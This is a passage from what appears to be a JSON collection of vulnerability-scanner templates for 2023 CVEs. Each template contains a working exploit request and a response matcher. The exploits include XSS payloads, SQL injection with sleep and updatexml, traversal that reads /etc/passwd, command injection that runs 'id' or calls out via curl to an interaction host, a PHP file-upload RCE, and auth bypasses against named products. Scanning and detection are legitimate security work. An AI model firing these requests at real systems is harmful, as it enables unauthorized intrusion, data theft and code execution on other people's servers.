Token","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/v1/folder?path=%2F"],"headers":{"Authorization":"{{jwt_token}}"},"matchers":[{"type":"word","words":["\"success\":200","\"message\":\"ok\"","content","is_dir"],"condition":"and"}],"extractors":[{"type":"json","json":[".data.content[].path"]}]}]},{"id":"CVE-2023-26842","info":{"name":"ChurchCRM 4.5.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /session/begin HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nUser={{username}}&Password={{password}}\n","POST /OptionManager.php?mode=classes&ListID=1 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n1name=Member&2name=Regular+Attender&3name=Guest&4name=Non-Attender&5name=Non-Attender+%28staff%29&newFieldName=\" onfocus=alert(document.domain) autofocus=\"&AddField=Add+New+Person+Classification\n"],"redirects":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(content_type_2, \"text/html\")","contains(body_2, \"onfocus=alert(document.domain) autofocus=\")","contains(body_2, \"ChurchCRM\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["id=\"form_session_token\" value=\"(.*)\" type=\"hidden\""],"internal":true}]}]},{"id":"CVE-2023-29923","info":{"name":"PowerJob <=4.3.2 - Unauthenticated Access","severity":"medium"},"requests":[{"raw":["POST /job/list HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json;charset=UTF-8\n\n{\"appId\":1,\"index\":0,\"pageSize\":10}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{\"success\":true,\"data\":{\"index\":0,\"pageSize\":10,"]},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-27008","info":{"name":"ATutor < 2.2.1 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["POST /atutor/login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ntoken=asdf\");}alert(document.domain);+function+asdf()+{//\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":[");}alert(document.domain); function","ATutor","Login"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-1177","info":{"name":"Mlflow <2.2.1 - Local File Inclusion","severity":"critical"},"requests":[{"raw":["POST /ajax-api/2.0/mlflow/registered-models/create HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json; charset=utf-8\n\n{\"name\":\"{{randstr}}\"}\n","POST /ajax-api/2.0/mlflow/model-versions/create HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json; charset=utf-8\n\n{\"name\":\"{{randstr}}\",\"source\":\"file:///etc/\"}\n","GET /model-versions/get-artifact?path=passwd&name=AJAX-API&version={{version}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"version","group":1,"regex":["\"version\": \"([0-9.]+)\","],"internal":true,"part":"body"}]}]},{"id":"CVE-2023-2796","info":{"name":"EventON <= 2.1 - Missing Authorization","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=eventon_ics_download&event_id=1"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["BEGIN:VCALENDAR","END:VCALENDAR"],"condition":"and"},{"type":"word","part":"header","words":["text/Calendar"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-44353","info":{"name":"Adobe ColdFusion WDDX Deserialization Gadgets","severity":"critical"},"requests":[{"raw":["POST /CFIDE/wizards/common/utils.cfc?method=wizardHash%20inPassword=bar%20_cfclient=true HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nargumentCollection=<wddxPacket+version='1.0'><header/><data><struct+type='acoldfusion.tagext.io.cache.CacheTaga'><var+name='directory'><string>{{windows_known_path}}</string></var></struct></data></wddxPacket>\n","POST /CFIDE/wizards/common/utils.cfc?method=wizardHash%20inPassword=bar%20_cfclient=true HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nargumentCollection=<wddxPacket+version='1.0'><header/><data><struct+type='acoldfusion.tagext.io.cache.CacheTaga'><var+name='directory'><string>{{windows_bad_path}}</string></var></struct></data></wddxPacket>\n","POST /CFIDE/wizards/common/utils.cfc?method=wizardHash%20inPassword=bar%20_cfclient=true HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nargumentCollection=<wddxPacket+version='1.0'><header/><data><struct+type='acoldfusion.tagext.io.cache.CacheTaga'><var+name='directory'><string>{{linux_known_path}}</string></var></struct></data></wddxPacket>\n","POST /CFIDE/wizards/common/utils.cfc?method=wizardHash%20inPassword=bar%20_cfclient=true HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nargumentCollection=<wddxPacket+version='1.0'><header/><data><struct+type='acoldfusion.tagext.io.cache.CacheTaga'><var+name='directory'><string>{{linux_bad_path}}</string></var></struct></data></wddxPacket>\n"],"matchers-condition":"or","matchers":[{"type":"dsl","name":"windows","dsl":["status_code_1 == 500 && status_code_2 == 404","contains(body_1, \"coldfusion.runtime\")"],"condition":"and"},{"type":"dsl","name":"linux","dsl":["status_code_3 == 500 && status_code_4 == 404","contains(body_3, \"coldfusion.runtime\")"],"condition":"and"}]}]},{"id":"CVE-2023-41109","info":{"name":"SmartNode SN200 Analog Telephone Adapter (ATA) & VoIP Gateway - Command Injection","severity":"critical"},"requests":[{"raw":["POST /rest/xxxxxxxxxxxxxxx/xxxxxxx?executeAsync HTTP/1.1\nHost: {{Hostname}}\nCookie: AuthToken=; AuthGroup=superuser; UserName=admin\n\n{\"cmd\":\"{{payload}}\",\"arguments\":[]}\n"],"matchers":[{"type":"word","part":"body","words":["dd556350275e2ee0a2e877cea9c8a74a"]}]}]},{"id":"CVE-2023-31059","info":{"name":"Repetier Server - Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/views..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cProgramData%5cRepetier-Server%5cdatabase%5cuser.sql%20/base/connectionLost.php"],"matchers-condition":"and","matchers":[{"type":"binary","part":"body","binary":["53514C69746520666F726D6174203300"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-29298","info":{"name":"Adobe ColdFusion - Access Control Bypass","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}//CFIDE/wizards/common/utils.cfc?method=wizardHash&inPassword=foo&_cfclient=true&returnFormat=wddx"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["([0-9a-fA-F]{32},){2}[0-9a-fA-F]{32}"]},{"type":"dsl","dsl":["contains(content_type, \"text/html\")","status_code == 200","len(trim_space(body)) == 106"],"condition":"and"}]}]},{"id":"CVE-2023-2948","info":{"name":"OpenEMR < 7.0.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/library/custom_template/share_template.php?list_id=1}});}}alert(document.domain);function%20x(){if(1){a=({a:{a:1"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(header, \"text/html\")","contains_all(body, \"list_id: 1}});}}alert(document.domain);\", \"select at least one Provider\", \"Save</span>\")"],"condition":"and"}]}]},{"id":"CVE-2023-5375","info":{"name":"Mosparo < 1.0.2 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/project/switch/1?targetPath=http://oast.pro"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\\-_\\.@]*)oast\\.pro.*$"]}]}]},{"id":"CVE-2023-3936","info":{"name":"Blog2Social < 7.2.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=blog2social&origin=publish_post&deletePostStatus=success&deletedPostsNumber=1<img+src+onerror%3Dalert%28document.domain%29> HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Deleted 1<img src onerror=alert(document.domain)> posts"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-50917","info":{"name":"MajorDoMo thumb.php - OS Command Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1&transport=%7C%7C+%28echo+%27%5BS%5D%27%3B+id%3B+echo+%27%5BE%5D%27%29%23%3B"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["uid=([0-9(a-z)]+) gid=([0-9(a-z)]+)","rtsp_transport"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-37270","info":{"name":"Piwigo 13.7.0 - SQL Injection","severity":"high"},"requests":[{"raw":["POST /identification.php HTTP/1.1\nHost: {{Hostname}}\nUser-Agent: '\">{{7*7}}${2*2}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}&password={{password}}&login=\n","GET /admin.php?page=user_activity HTTP/1.1\nHost: {{Hostname}}\n"],"host-redirects":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["Warning: [mysql error","INSERT  INTO","SQL syntax;"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-1454","info":{"name":"Jeecg-boot 3.5.0 qurestSql - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /jeecg-boot/jmreport/qurestSql HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json;charset=UTF-8\n\n{\"apiSelectId\":\"1316997232402231298\",\"id\":\"1' or '%1%' like (updatexml(0x3a,concat(1,(select current_user)),1)) or '%%' like '\"}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["SQLException","XPATH syntax error:"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","group":1,"regex":["XPATH syntax error: '([a-z_@%]+)'","XPATH syntax error: '([a-z- @%]+)'","XPATH syntax error: '([a-z@%0-9.]+)'"],"part":"body"}]}]},{"id":"CVE-2023-25717","info":{"name":"Ruckus Wireless Admin - Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/forms/doLogin?login_username=admin&password=password$(curl%20{{interactsh-url}})&x=0&y=0"],"matchers":[{"type":"dsl","dsl":["contains(interactsh_protocol, 'http')","contains_all(to_lower(interactsh_request), 'user-agent','curl')","status_code_1 == 302"],"condition":"and"}]}]},{"id":"CVE-2023-1434","info":{"name":"Odoo - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/web/set_profiling?profile=0&collectors=<script>alert(document.domain)</script>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>","\"params\":","session"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-35078","info":{"name":"Ivanti Endpoint Manager Mobile (EPMM) - Authentication Bypass","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/mifs/aad/api/v2/admins/users"],"max-size":100,"matchers":[{"type":"dsl","dsl":["contains_all(body, 'results','userId','name')","contains(header, 'application/json')","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2023-2224","info":{"name":"Seo By 10Web < 1.2.7 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=wdseo_sitemap HTTP/1.1\nHost: {{Hostname}}\n","POST /wp-admin/admin.php?page=wdseo_sitemap&id_message=2 HTTP/1.1\nHost: {{Hostname}}\n\ntask=save&wd_settings%5Bsitemap%5D=1&wd_settings%5Bbing_verification%5D=&wd_settings%5Byandex_verification%5D=&wd_settings%5Bnotify_google%5D=0&wd_settings%5Bnotify_bing%5D=0&wd_settings%5Badditional_pages%5D%5B%5D=&wd_settings%5Badditional_pages%5D%5Bpage_url%5D%5B%5D=%22%3E%3Caudio+src%3Dx+onerror%3Dconfirm%28document.domain%29%3E&wd_settings%5Badditional_pages%5D%5Bpriority%5D%5B%5D=0&wd_settings%5Badditional_pages%5D%5Bfrequency%5D%5B%5D=always&wd_settings%5Badditional_pages%5D%5Blast_changed%5D%5B%5D=&wd_settings%5Bexclude_post_types%5D%5B%5D=&wd_settings%5Bexclude_taxonomies%5D%5B%5D=&wd_settings%5Bexclude_archives%5D%5B%5D=&wd_settings%5Bexclude_posts%5D=&wd_settings%5Bsitemap_image%5D=0&wd_settings%5Bsitemap_video%5D=0&wd_settings%5Bsitemap_stylesheet%5D=1&wd_settings%5Blimit%5D=1000&wd_settings%5Bautoupdate_sitemap%5D=0&nonce_wdseo={{nonce}}&_wp_http_referer=%2Fwp-admin%2Fadmin.php%3Fpage%3Dwdseo_sitemap%26id_message%3D1\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_3","words":["value=\"\"><audio src=x onerror=confirm(document.domain)>\""]},{"type":"word","part":"header_3","words":["text/html"]},{"type":"status","part":"header_3","status":[200]}],"extractors":[{"type":"regex","name":"nonce","part":"body","group":1,"regex":["name=\"nonce_wdseo\" value=\"([a-z0-9]+)\" \\/>"],"internal":true}]}]},{"id":"CVE-2023-43187","info":{"name":"NodeBB XML-RPC Request xmlrpc.php - XML Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}"],"matchers":[{"type":"dsl","internal":true,"dsl":["contains(to_lower(body), \"nodebb\")"]}]},{"method":"POST","path":["{{BaseURL}}/xmlrpc.php"],"headers":{"Content-Type":"text/xml"},"body":"<?xml version=\"1.0\"?>\n<methodCall>\n  <methodName>system.listMethods</methodName>\n  <params>\n    <param>\n      <value><?php phpinfo(); ?></value>\n    </param>\n  </params>\n</methodCall>\n","matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<title>phpinfo()</title>","PHP Version"],"condition":"or"},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-27032","info":{"name":"PrestaShop AdvancedPopupCreator - SQL Injection","severity":"critical"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n","@timeout 20s\nPOST /module/advancedpopupcreator/popup HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\navailablePopups=if(now()=sysdate()%2Csleep(6)%2C0)&event=1&fromController=product&getPopup=1&id_category=0&id_manufacturer=0&id_product=1&id_supplier=0&referrer=&responsiveWidth=1280&time={{time}}&token={{token}}\n"],"matchers":[{"type":"dsl","dsl":["duration_2>=6","status_code == 200","contains(content_type, \"text/html\")","contains_all(body, 'popups','hasError')"],"condition":"and"}],"extractors":[{"type":"regex","name":"time","group":1,"regex":[",\"time\":([0-9]+),"],"internal":true},{"type":"regex","name":"token","group":1,"regex":[",\"static_token\":\"([0-9a-z]+)\","],"internal":true}]}]},{"id":"CVE-2023-34753","info":{"name":"bloofoxCMS v0.5.2.1 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /admin/index.php HTTP/2\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}&password={{password}}&action=login\n","@timeout: 10s\nPOST /admin/index.php?mode=settings&page=tmpl&action=edit HTTP/2\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nname=default&template=default.html&css=default.css&template_print=print.html&template_print_css=print.css&template_login=login.html&template_text=text.html&be=0&tid='+AND+(SELECT+7401+FROM+(SELECT(SLEEP(6)))hwrS)--+&send=Save\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["duration>=6","contains(header_2, \"text/html\")","contains(body_2, 'bloofoxCMS Admincenter')"],"condition":"and"}]}]},{"id":"CVE-2023-27292","info":{"name":"OpenCATS - Open Redirect","severity":"medium"},"requests":[{"raw":["POST /index.php?m=login&a=attemptLogin HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}&password={{password}}\n","GET /index.php?m=settings&a=previewPage&url=https://oast.me HTTP/1.1\nHost: {{Hostname}}\n"],"host-redirects":true,"matchers-condition":"and","matchers":[{"type":"word","words":["<TITLE>Page Preview</TITLE>","<FRAME src=\"https://oast.me\">"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-44352","info":{"name":"Adobe Coldfusion - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/{{string}}\"><img src=a onerror=alert(document.domain)>/..CFIDE/wizards/common/_authenticatewizarduser.cfm","{{BaseURL}}//{{string}}\"><img src=a onerror=alert(document.domain)>/..CFIDE/wizards/common/_authenticatewizarduser.cfm","{{BaseURL}}/{{string}}\"><img src=a onerror=alert(document.domain)>/..CFIDE/administrator/index.cfm","{{BaseURL}}//{{string}}\"><img src=a onerror=alert(document.domain)>/..CFIDE/administrator/index.cfm","{{BaseURL}}/{{string}}%22>%3Cscript%3Ealert(document.domain)%3C/script%3E/..CFIDE/administrator/index.cfm","{{BaseURL}}//{{string}}%22>%3Cscript%3Ealert(document.domain)%3C/script%3E/..CFIDE/administrator/index.cfm","{{BaseURL}}/{{string}}%22>%3Cscript%3Ealert(document.domain)%3C/script%3E/..CFIDE/wizards/common/_authenticatewizarduser.cfm","{{BaseURL}}//{{string}}%22>%3Cscript%3Ealert(document.domain)%3C/script%3E/..CFIDE/wizards/common/_authenticatewizarduser.cfm"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["action=\"/{{string}}\"><img src=a onerror=alert(document.domain)>","\"{{string}}\"><script>alert(document.domain)</script>"],"condition":"or"},{"type":"dsl","dsl":["contains(body, 'ColdFusion')","contains(header, 'text/html')"],"condition":"and"}]}]},{"id":"CVE-2023-0562","info":{"name":"Bank Locker Management System v1.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /banker/index.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername=admin%27+AND+4719%3D4719--+GZHh&inputpwd=ABC&login=\n"],"redirects":true,"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(body, \"admin\")","contains(body, \"BLMS | Dashboard\")"],"condition":"and"}]}]},{"id":"CVE-2023-49103","info":{"name":"OwnCloud - Phpinfo Configuration","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/apps/graphapi/vendor/microsoft/microsoft-graph/tests/GetPhpInfo.php/{{rand_base(4)}}.css","{{BaseURL}}/owncloud/apps/graphapi/vendor/microsoft/microsoft-graph/tests/GetPhpInfo.php/{{rand_base(4)}}.css"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["PHP Extension","PHP Version","owncloud"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-27639","info":{"name":"PrestaShop TshirteCommerce - Directory Traversal","severity":"high"},"requests":[{"method":"POST","path":["{{BaseURL}}/tshirtecommerce/ajax.php?type=svg"],"headers":{"Content-Type":"application/x-www-form-urlencoded"},"body":"url=.%2F..%2Fvendor%2Fjdorn%2Fsql-formatter%2Fexamples&file_name=examples.php","matchers-condition":"and","matchers":[{"type":"word","words":["SqlFormatter Examples","SqlFormatter","<?php"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-3479","info":{"name":"Hestiacp <= 1.7.7 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/templates/pages/debug_panel.php?id={{randstr}}\"><script>alert(document.domain)</script>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["debug-panel","<script>alert(document.domain)</script>"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-29439","info":{"name":"FooGallery plugin <= 2.2.35 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/post-new.php?post_type=foogallery&post=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["data-gallery_id=\"\\\"><script>alert(document.domain)</script>\"","foogallery-image-edit-modal"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-2648","info":{"name":"Weaver E-Office 9.5 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /inc/jquery/uploadify/uploadify.php  HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundarydRVCGWq4Cx3Sq6tt\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\n\n------WebKitFormBoundarydRVCGWq4Cx3Sq6tt\nContent-Disposition: form-data; name=\"Filedata\"; filename=\"{{file}}.php.\"\nContent-Type: image/jpeg\n\n<?php echo md5(\"{{string}}\");unlink(__FILE__);?>\n------WebKitFormBoundarydRVCGWq4Cx3Sq6tt\n","POST /attachment/{{name}}/{{file}}.php  HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["{{md5(string)}}"]},{"type":"status","part":"body_2","status":[200]}],"extractors":[{"type":"regex","name":"name","part":"body","group":1,"regex":["([0-9]+)"],"internal":true}]}]},{"id":"CVE-2023-1890","info":{"name":"Tablesome < 1.0.9 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/edit.php?post_type=tablesome_cpt&a%22%3e%3cscript%3ealert`document.domain`%3c%2fscript%3e HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(content_type_2, \"text/html\")","contains(body_2, \"<script>alert`document_domain`</script>\")","contains(body_2, \"tablesome\")"],"condition":"and"}]}]},{"id":"CVE-2023-39700","info":{"name":"IceWarp Mail Server v10.4.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /webmail/?color=%22%3E%3Cimg%20src=x%20onerror=confirm(document.cookie)%3E HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(header, \"text/html\")","contains(body, \"><img src=x onerror=confirm(document.cookie)>\") && contains(body, \"IceWarp\")"],"condition":"and"}]}]},{"id":"CVE-2023-35158","info":{"name":"XWiki - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/xwiki/bin/view/XWiki/Main?xpage=restore&showBatch=true&xredirect=javascript:alert(document.domain)"],"matchers":[{"type":"dsl","dsl":["contains(body, \"href=\\\"javascript:alert(document.domain)\\\">Cancel</a>\")","contains(header, \"text/html\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2023-3077","info":{"name":"MStore API < 3.9.8 - SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/mstore-api/readme.txt"],"matchers":[{"type":"dsl","internal":true,"dsl":["status_code == 200","contains(body, \"MStore API\")"],"condition":"and"}]},{"raw":["@timeout: 15s\nGET /wp-json/api/flutter_booking/get_staffs?product_id=%27+or+ID=sleep(6)--+- HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2023-23752","info":{"name":"Joomla! Webservice - Password Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/index.php/v1/config/application?public=true","{{BaseURL}}/api/v1/config/application?public=true"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"links\":","\"attributes\":"],"condition":"and"},{"type":"word","part":"header","words":["application/json","application/vnd.api+json"],"condition":"or"},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-3847","info":{"name":"MooDating 1.2 - Cross-Site scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/users/viewi1omd%22%3e%3cimg%20src%3da%20onerror%3dalert(document.domain)%3el43yn/108?tab=activity"],"matchers":[{"type":"dsl","dsl":["status_code == 404","contains(content_type, \"text/html\")","contains_all(body, \"><img src=a onerror=alert(document.domain)>\",\"mooDating\")"],"condition":"and"}]}]},{"id":"CVE-2023-4634","info":{"name":"Media Library Assistant < 3.09 - Remote Code Execution/Local File Inclusion","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/media-library-assistant/readme.txt","{{BaseURL}}/wp-content/plugins/media-library-assistant/includes/mla-stream-image.php?mla_stream_file=ftp://{{interactsh-url}}/patrowl.svg"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_1","words":["Media Library Assistant"]},{"type":"word","part":"interactsh_protocol","words":["dns"]}]}]},{"id":"CVE-2023-52085","info":{"name":"Winter CMS Local File Inclusion - (LFI)","severity":"medium"},"requests":[{"raw":["GET /backend/backend/auth/signin HTTP/1.1\nHost: {{Hostname}}\n","POST /backend/backend/auth/signin HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n_token={{_token}}&postback=1&login={{username}}&password={{password}}\n","POST /backend/system/mailbrandsettings HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nX-WINTER-REQUEST-HANDLER: onSave\nX-WINTER-REQUEST-PARTIALS:\nX-Requested-With: XMLHttpRequest\n\n_token={{_token}}&MailBrandSetting%5Bbody_bg%5D=%2342445B;@import%20(inline)%20%22/etc/passwd%22&redirect=0\n","GET /backend/system/mailbrandsettings HTTP/1.1\nHost: {{Hostname}}\n"],"host-redirects":true,"max-redirects":3,"matchers":[{"type":"regex","part":"body_4","regex":["root:[x*]:0:0:"]}],"extractors":[{"type":"regex","part":"body","name":"_token","group":1,"regex":["<input name=\"_token\" type=\"hidden\" value=\"([0-9a-zA-Z]{40})\">"],"internal":true}]}]},{"id":"CVE-2023-27482","info":{"name":"Home Assistant Supervisor - Authentication Bypass","severity":"critical"},"requests":[{"raw":["GET /api/hassio/app/.%252e/supervisor/info HTTP/1.1\nHost: {{Hostname}}\n","GET /api/hassio/app/.%09./supervisor/info HTTP/1.1 # Mitigation bypass 1\nHost: {{Hostname}}\n","GET /api/hassio_ingress/.%09./supervisor/info HTTP/1.1 # Mitigation bypass 2\nHost: {{Hostname}}\nX-Hass-Is-Admin:1\n"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","words":["\"slug\":","\"name\":","\"ip_address\""],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-44012","info":{"name":"mojoPortal v.2.7.0.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/Help.aspx?helpkey=xxxxxxx'><svg/onload=alert()+x="],"matchers":[{"type":"dsl","dsl":["contains_any(body, \"mojoPortal\", \"mojo-accordion\", \"mojo-tabs\")","contains(body, \"><svg/onload=alert()\")","contains(header, \"text/html\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2023-24367","info":{"name":"Temenos T24 R20 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/jsps/genrequest.jsp?routineName=\"><script>alert(document.domain)</script>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>","<title>Processing...</title>"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-2252","info":{"name":"Directorist < 7.5.4 - Local File Inclusion","severity":"low"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/edit.php?post_type=at_biz_dir&page=tools&step=2&file=%2Fetc%2Fpasswd&delimiter=%3B HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-37462","info":{"name":"XWiki Platform - Remote Code 